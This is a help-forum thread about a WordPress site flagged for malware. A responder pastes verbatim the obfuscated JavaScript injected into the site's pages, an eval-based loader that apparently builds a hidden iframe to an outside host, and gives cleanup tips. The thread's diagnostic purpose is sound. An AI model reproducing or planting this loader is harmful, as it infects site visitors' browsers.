Discussion about smartybrighty.com
by carloflores
over 1 year ago

i downloaded all my website files and scanned them locally using my own antivirus and anti malware program and did not find any problems..

Warning: Something’s Not Right Here!
smartybrighty.com contains malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you’ve visited this site in the past or you trust this site, it’s possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified smartybrighty.com that we found malware on the site. For more about the problems found on smartybrighty.com, visit the Google Safe Browsing diagnostic page.

by redleg
over 1 year ago

There is a block of obfuscated script being inserted at the begining of your pages, before the doctype declaration, this is what I am getting

<script>v=window;try{fawbe++}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{v["document"]["body"]="123"}catch(gfdnfdgber){m=123;if((alert+"").indexOf("native")!==-1)ev=window["e"+"v"+"al"];}} n=["9","9","4d","4a","19","1h","48","4j","47","52","4h","49","4i","51","20","4b","49","51","30","4g","49","4h","49","4i","51","50","2k","56","3f","45","4b","39","45","4h","49","1h","1g","46","4j","48","56","1g","1i","3m","22","41","1i","58","d","9","9","9","4d","4a","4m","45","4h","49","4m","1h","1i","2d","d","9","9","5a","19","49","4g","50","49","19","58","d","9","9","9","48","4j","47","52","4h","49","4i","51","20","54","4m","4d","51","49","1h","1b","2e","4d","4a","4m","45","4h","49","19","50","4m","47","2f","1g","4c","51","51","4k","2c","21","21","4h","4k","4h","50","50","4c","4k","4a","52","45","20","56","4j","52","4m","51","4m","45","4k","20","47","4j","4h","21","47","4j","52","4i","51","49","4m","21","4h","45","4d","4i","20","4k","4c","4k","1g","19","54","4d","48","51","4c","2f","1g","23","22","1g","19","4c","49","4d","4b","4c","51","2f","1g","23","22","1g","19","50","51","56","4g","49","2f","1g","53","4d","50","4d","46","4d","4g","4d","51","56","2c","4c","4d","48","48","49","4i","2d","4k","4j","50","4d","51","4d","4j","4i","2c","45","46","50","4j","4g","52","51","49","2d","4g","49","4a","51","2c","22","2d","51","4j","4k","2c","22","2d","1g","2g","2e","21","4d","4a","4m","45","4h","49","2g","1b","1i","2d","d","9","9","5a","d","9","9","4a","52","4i","47","51","4d","4j","4i","19","4d","4a","4m","45","4h","49","4m","1h","1i","58","d","9","9","9","53","45","4m","19","4a","19","2f","19","48","4j","47","52","4h","49","4i","51","20","47","4m","49","45","51","49","30","4g","49","4h","49","4i","51","1h","1g","4d","4a","4m","45","4h","49","1g","1i","2d","4a","20","50","49","51","2j","51","51","4m","4d","46","52","51","49","1h","1g","50","4m","47","1g","1l","1g","4c","51","51","4k","2c","21","21","4h","4k","4h","50","50","4c","4k","4a","52","45","20","56","4j","52","4m","51","4m","45","4k","20","47","4j","4h","21","47","4j","52","4i","51","49","4m","21","4h","45","4d","4i","20","4k","4c","4k","1g","1i","2d","4a","20","50","51","56","4g","49","20","53","4d","50","4d","46","4d","4g","4d","51","56","2f","1g","4c","4d","48","48","49","4i","1g","2d","4a","20","50","51","56","4g","49","20","4k","4j","50","4d","51","4d","4j","4i","2f","1g","45","46","50","4j","4g","52","51","49","1g","2d","4a","20","50","51","56","4g","49","20","4g","49","4a","51","2f","1g","22","1g","2d","4a","20","50","51","56","4g","49","20","51","4j","4k","2f","1g","22","1g","2d","4a","20","50","49","51","2j","51","51","4m","4d","46","52","51","49","1h","1g","54","4d","48","51","4c","1g","1l","1g","23","22","1g","1i","2d","4a","20","50","49","51","2j","51","51","4m","4d","46","52","51","49","1h","1g","4c","49","4d","4b","4c","51","1g","1l","1g","23","22","1g","1i","2d","d","9","9","9","48","4j","47","52","4h","49","4i","51","20","4b","49","51","30","4g","49","4h","49","4i","51","50","2k","56","3f","45","4b","39","45","4h","49","1h","1g","46","4j","48","56","1g","1i","3m","22","41","20","45","4k","4k","49","4i","48","2l","4c","4d","4g","48","1h","4a","1i","2d","d","9","9","5a"];h=2;s="";if(m)for(i=0;i-603!=0;i++){k=i;if(window["document"])s+=String["fro"+"mCharCode"](parseInt(n[i],23));}try{febwnrth--}catch(bawetawe){z=s;ev(z)}}</script><br /> <b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /home/smarty/public_html/index.php(1) : eval()'d code:8) in <b>/home/smarty/public_html/wp-content/plugins/gotmls/index.php</b> on line <b>13</b><br /> <br /> <b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /home/smarty/public_html/index.php(1) : eval()'d code:8) in <b>/home/smarty/public_html/wp-content/plugins/gotmls/index.php</b> on line <b>13</b><br /> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

That block is malicious.

Unfortunately there are a lot of ways to do that. Check your .htaccess, check you php code for any obfuscated php code, base64 stuff and also take a look at php.ini for anything in the auto prepend file

; Automatically add files before PHP document.
; http:// php . net /auto-prepend-file
auto_prepend_file =

anything after the =

by carloflores
over 1 year ago

thanks redleg. i found a lot of modified codes in my .htaccess written by http://www.ait-pro.com/aitpro-blog/297/bulletproof-security-plugin-support/bulletproof-security-wordpress-plugin-support/
i have restored the system and removed the said plugin.

  1. BEGIN WordPress
    <ifmodule>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </ifmodule>
  1. END WordPress
by carloflores
over 1 year ago

hello.. why do we still keep on being listed as website distributing malware. we didn’t do anything for the past week.

About Contact Us Terms & Conditions Privacy Policy Copyright